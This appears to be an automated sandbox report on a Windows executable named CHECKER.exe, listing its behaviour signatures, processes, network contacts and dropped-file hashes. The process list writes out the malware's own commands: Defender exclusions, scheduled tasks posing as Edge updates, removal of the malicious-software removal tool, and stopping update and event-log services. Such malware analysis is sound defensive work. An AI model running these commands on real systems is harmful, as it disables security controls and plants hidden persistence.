Analysis Overview
SHA256
38fcbc520ffdd2c818cc0a0cc662db028994647603c5ede66ddb16aa5879ec6c
Threat Level: Likely malicious
The file CHECKER.exe was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Creates new service(s)
Stops running service(s)
Looks for VMWare Tools registry key
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-07 23:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-07 23:06
Reported
2024-04-07 23:09
Platform
win10-20240404-en
Max time kernel
150s
Max time network
143s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\CHECKER.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Local\Temp\CHECKER.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\audiodg.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeChecker = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CHECKER.exe" | C:\Users\Admin\AppData\Local\Temp\CHECKER.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\EdgeUpdater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\audiodg.exe" | C:\Users\Admin\AppData\Local\Temp\CHECKER.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\audiodg.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4516 set thread context of 484 | N/A | C:\Users\Admin\AppData\Local\Temp\audiodg.exe | C:\Windows\system32\dialer.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Users\Admin\AppData\Local\Temp\CHECKER.exe
"C:\Users\Admin\AppData\Local\Temp\CHECKER.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CHECKER.exe'"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCore{5GC93CA01-CJ51-H34A-F4K1-EC0217BD138C}" /TR "C:\Users\Admin\AppData\Local\Temp\CHECKER.exe" /RL HIGHEST /F
C:\Users\Admin\AppData\Local\Temp\audiodg.exe
C:\Users\Admin\AppData\Local\Temp\audiodg.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCore{3FD61DA67-EE83-4DEC-A42C-EC0217BD120C}" /TR "C:\Users\Admin\AppData\Local\Temp\audiodg.exe" /RL HIGHEST /F
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "svchost"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "svchost" binpath= "C:\ProgramData\RunDLL\taskhostw.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "svchost"
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
Files
memory/4448-0-0x0000000000800000-0x0000000000801000-memory.dmp
memory/4448-2-0x0000000000910000-0x0000000001819000-memory.dmp
memory/4448-1-0x0000000000910000-0x0000000001819000-memory.dmp
memory/2296-5-0x0000000006B20000-0x0000000006B56000-memory.dmp
memory/2296-6-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/2296-7-0x0000000003020000-0x0000000003030000-memory.dmp
memory/2296-8-0x0000000003020000-0x0000000003030000-memory.dmp
memory/2296-9-0x0000000007190000-0x00000000077B8000-memory.dmp
memory/2296-10-0x0000000007840000-0x0000000007862000-memory.dmp
memory/2296-11-0x00000000079C0000-0x0000000007A26000-memory.dmp
memory/2296-12-0x00000000078E0000-0x0000000007946000-memory.dmp
memory/2296-13-0x0000000007BD0000-0x0000000007F20000-memory.dmp
memory/2296-14-0x0000000007B40000-0x0000000007B5C000-memory.dmp
memory/2296-15-0x0000000008430000-0x000000000847B000-memory.dmp
memory/2296-16-0x0000000008230000-0x00000000082A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wunhuih.utp.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2296-33-0x0000000009390000-0x00000000093C3000-memory.dmp
memory/2296-34-0x0000000070720000-0x000000007076B000-memory.dmp
memory/2296-36-0x0000000009370000-0x000000000938E000-memory.dmp
memory/4448-35-0x0000000000910000-0x0000000001819000-memory.dmp
memory/2296-41-0x000000007E180000-0x000000007E190000-memory.dmp
memory/2296-42-0x00000000094D0000-0x0000000009575000-memory.dmp
memory/2296-43-0x0000000003020000-0x0000000003030000-memory.dmp
memory/2296-44-0x0000000009690000-0x0000000009724000-memory.dmp
memory/2296-237-0x0000000009640000-0x000000000965A000-memory.dmp
memory/2296-242-0x0000000009630000-0x0000000009638000-memory.dmp
memory/2296-258-0x0000000073B40000-0x000000007422E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\audiodg.exe
| MD5 | 047ece692744926c57a5cf74ec892b2a |
| SHA1 | 33c2fb7f524056a12f75bd07854818650ce351a3 |
| SHA256 | 2b46c5609e8aede8c919b9b5d80ac7dadddb288eb7a8ee49a1e8bda0958c81a7 |
| SHA512 | 31f4a8f66d299f858a41b0e9ba8d8539af8e65c30975b66212f3d57b45432b23bd868f4b75b74e7f679c4a0cdf5d728a96a10efe8f605097ec4e16433d385a41 |
memory/588-286-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp
memory/588-285-0x0000016F77FE0000-0x0000016F78002000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6e00909a940924dcb736787715d1e55 |
| SHA1 | f6b640080777d173cea6c2d5eed9c2138cac24d1 |
| SHA256 | a00e099601428a75e958f111b61a739c3ca6c6a89919a416a4a6a6a07734f9f8 |
| SHA512 | b97d0014a336baca090a2c23e52ecd4b4d87bad9d20a29ea95d6400eef963a82db6ab8b0c1b407368cf25fb84c7e4312d02b3423600b58b11f6965c81095a416 |
memory/588-287-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp
memory/588-288-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp
memory/588-291-0x0000016F78190000-0x0000016F78206000-memory.dmp
memory/588-304-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp
memory/588-326-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp
memory/588-331-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp
memory/484-332-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-333-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-335-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-334-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-337-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-339-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp
memory/484-341-0x00007FFAA75B0000-0x00007FFAA765E000-memory.dmp
memory/484-342-0x0000000140000000-0x000000014002B000-memory.dmp
memory/580-345-0x0000018AE20A0000-0x0000018AE20C4000-memory.dmp
memory/640-348-0x000001AC41640000-0x000001AC4166B000-memory.dmp
memory/580-347-0x0000018AE20D0000-0x0000018AE20FB000-memory.dmp
memory/640-349-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/580-350-0x00007FFAA9915000-0x00007FFAA9916000-memory.dmp
memory/640-353-0x00007FFAA9915000-0x00007FFAA9916000-memory.dmp
memory/640-352-0x000001AC41640000-0x000001AC4166B000-memory.dmp
memory/740-357-0x000001AA35800000-0x000001AA3582B000-memory.dmp
memory/740-358-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1016-361-0x0000017CCE400000-0x0000017CCE42B000-memory.dmp
memory/900-369-0x00000127A3960000-0x00000127A398B000-memory.dmp
memory/352-370-0x000001578E020000-0x000001578E04B000-memory.dmp
memory/4448-376-0x0000000000910000-0x0000000001819000-memory.dmp
memory/352-375-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/900-367-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1016-365-0x00007FFAA9915000-0x00007FFAA9916000-memory.dmp
memory/900-364-0x00000127A3960000-0x00000127A398B000-memory.dmp
memory/692-377-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1068-386-0x000001A57AD60000-0x000001A57AD8B000-memory.dmp
memory/892-380-0x00000268B60C0000-0x00000268B60EB000-memory.dmp
memory/692-374-0x0000022CF2E30000-0x0000022CF2E5B000-memory.dmp
memory/892-383-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/352-392-0x000001578E020000-0x000001578E04B000-memory.dmp
memory/1096-393-0x000001FE6C0F0000-0x000001FE6C11B000-memory.dmp
memory/484-397-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp
memory/1164-395-0x000001A6A46B0000-0x000001A6A46DB000-memory.dmp
memory/1068-390-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/580-389-0x0000018AE20D0000-0x0000018AE20FB000-memory.dmp
memory/1016-399-0x0000017CCE400000-0x0000017CCE42B000-memory.dmp
memory/1096-401-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1164-408-0x000001A6A46B0000-0x000001A6A46DB000-memory.dmp
memory/1208-405-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1164-404-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1208-400-0x000001F621C80000-0x000001F621CAB000-memory.dmp
memory/1096-413-0x000001FE6C0F0000-0x000001FE6C11B000-memory.dmp
memory/1208-411-0x000001F621C80000-0x000001F621CAB000-memory.dmp
memory/1252-415-0x000002256C9A0000-0x000002256C9CB000-memory.dmp
memory/740-417-0x000001AA35800000-0x000001AA3582B000-memory.dmp
memory/900-418-0x00000127A3960000-0x00000127A398B000-memory.dmp
memory/1068-421-0x000001A57AD60000-0x000001A57AD8B000-memory.dmp
memory/892-420-0x00000268B60C0000-0x00000268B60EB000-memory.dmp
memory/692-419-0x0000022CF2E30000-0x0000022CF2E5B000-memory.dmp
memory/1164-422-0x000001A6A46B0000-0x000001A6A46DB000-memory.dmp
memory/1252-423-0x000002256C9A0000-0x000002256C9CB000-memory.dmp